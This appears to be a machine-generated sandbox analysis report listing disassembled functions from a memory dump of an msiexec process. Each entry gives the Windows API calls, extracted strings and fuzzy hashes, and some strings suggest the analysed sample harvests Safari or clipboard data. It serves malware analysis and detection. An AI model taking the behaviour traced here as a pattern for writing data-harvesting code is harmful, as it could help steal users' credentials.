                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcsicmp
                                                                                                      • String ID:
                                                                                                      • API String ID: 2081463915-0
                                                                                                      • Opcode ID: 8ecd19cd50b91feb9ece7647b88d70c74935930258f67524a15d6916c2203edb
                                                                                                      • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                      • Opcode Fuzzy Hash: 8ecd19cd50b91feb9ece7647b88d70c74935930258f67524a15d6916c2203edb
                                                                                                      • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 2136311172-0
                                                                                                      • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                      • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                      • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                      • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@??3@
                                                                                                      • String ID:
                                                                                                      • API String ID: 1936579350-0
                                                                                                      • Opcode ID: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                                                                      • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                      • Opcode Fuzzy Hash: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                                                                      • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free
                                                                                                      • String ID:
                                                                                                      • API String ID: 1294909896-0
                                                                                                      • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                      • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                      • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                      • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free
                                                                                                      • String ID:
                                                                                                      • API String ID: 1294909896-0
                                                                                                      • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                      • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                      • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                      • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free
                                                                                                      • String ID:
                                                                                                      • API String ID: 1294909896-0
                                                                                                      • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                      • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                                      • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                      • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                                                      APIs
                                                                                                      • EmptyClipboard.USER32 ref: 004098EC
                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                      • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                      • GetLastError.KERNEL32 ref: 0040995D
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                      • GetLastError.KERNEL32 ref: 00409974
                                                                                                      • CloseClipboard.USER32 ref: 0040997D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                      • String ID:
                                                                                                      • API String ID: 3604893535-0
                                                                                                      • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                      • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                      • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                      • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                      APIs
                                                                                                      • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                      • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$AddressFreeLoadMessageProc
                                                                                                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                      • API String ID: 2780580303-317687271
                                                                                                      • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                      • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                      • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                      • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                      APIs
                                                                                                      • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                      • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                      • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                      • String ID:
                                                                                                      • API String ID: 4218492932-0
                                                                                                      • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                      • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                      • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                      • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                      APIs
                                                                                                      • EmptyClipboard.USER32 ref: 00409882
                                                                                                      • wcslen.MSVCRT ref: 0040988F
                                                                                                      • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                      • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                      • CloseClipboard.USER32 ref: 004098D7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                      • String ID:
                                                                                                      • API String ID: 1213725291-0
                                                                                                      • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                      • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                      • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                      • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32 ref: 004182D7
                                                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                      • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                      • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                      • free.MSVCRT ref: 00418370
                                                                                                        • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,76F8DF80,?,0041755F,?), ref: 00417452
                                                                                                        • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                      • String ID: OsError 0x%x (%u)
                                                                                                      • API String ID: 2360000266-2664311388
                                                                                                      • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                      • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                      • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                      • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                      APIs
                                                                                                        • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                        • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                        • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                      • OpenClipboard.USER32(?), ref: 00411878
                                                                                                      • GetLastError.KERNEL32 ref: 0041188D
                                                                                                        • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                                                                        • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                        • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                        • Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                        • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                        • Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                        • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                        • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                        • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Clipboard$FileGlobal$CloseTemp$AllocDataDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                                                                                      • String ID:
                                                                                                      • API String ID: 2628231878-0
                                                                                                      • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                                      • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                                                                                      • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                                      • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 1865533344-0
                                                                                                      • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                                      • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                                      • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                                      • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                                      APIs
                                                                                                      • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Version
                                                                                                      • String ID:
                                                                                                      • API String ID: 1889659487-0
                                                                                                      • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                      • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                                      • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                      • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                                      APIs
                                                                                                      • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: NtdllProc_Window
                                                                                                      • String ID:
                                                                                                      • API String ID: 4255912815-0
                                                                                                      • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                      • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                                      • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                      • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                                      APIs
                                                                                                      • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                      • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                      • _wcsicmp.MSVCRT ref: 00402305
                                                                                                      • _wcsicmp.MSVCRT ref: 00402333
                                                                                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                        • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                      • memset.MSVCRT ref: 0040265F
                                                                                                      • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                      • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                      • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                                      • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                      • API String ID: 577499730-1134094380
                                                                                                      • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                                      • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                      • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                                      • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                      • String ID: :stringdata$ftp://$http://$https://
                                                                                                      • API String ID: 2787044678-1921111777
                                                                                                      • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                      • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                      • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                      • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                      • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                      • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                      • GetDC.USER32 ref: 004140E3
                                                                                                      • wcslen.MSVCRT ref: 00414123
                                                                                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                      • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                      • _snwprintf.MSVCRT ref: 00414244
                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                      • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                      • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                      • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                      • String ID: %s:$EDIT$STATIC
                                                                                                      • API String ID: 2080319088-3046471546
                                                                                                      • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                      • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                      • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                      • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                      APIs
                                                                                                      • EndDialog.USER32(?,?), ref: 00413221
                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                      • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                      • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                      • memset.MSVCRT ref: 00413292
                                                                                                      • memset.MSVCRT ref: 004132B4
                                                                                                      • memset.MSVCRT ref: 004132CD
                                                                                                      • memset.MSVCRT ref: 004132E1
                                                                                                      • memset.MSVCRT ref: 004132FB
                                                                                                      • memset.MSVCRT ref: 00413310
                                                                                                      • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                      • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                      • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                      • memset.MSVCRT ref: 004133C0
                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                      • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                      • wcscpy.MSVCRT ref: 0041341F
                                                                                                      • _snwprintf.MSVCRT ref: 0041348E
                                                                                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                      • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                      Strings
                                                                                                      • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                      • {Unknown}, xrefs: 004132A6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                      • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                      • API String ID: 4111938811-1819279800
                                                                                                      • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                      • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                      • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                      • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                      APIs
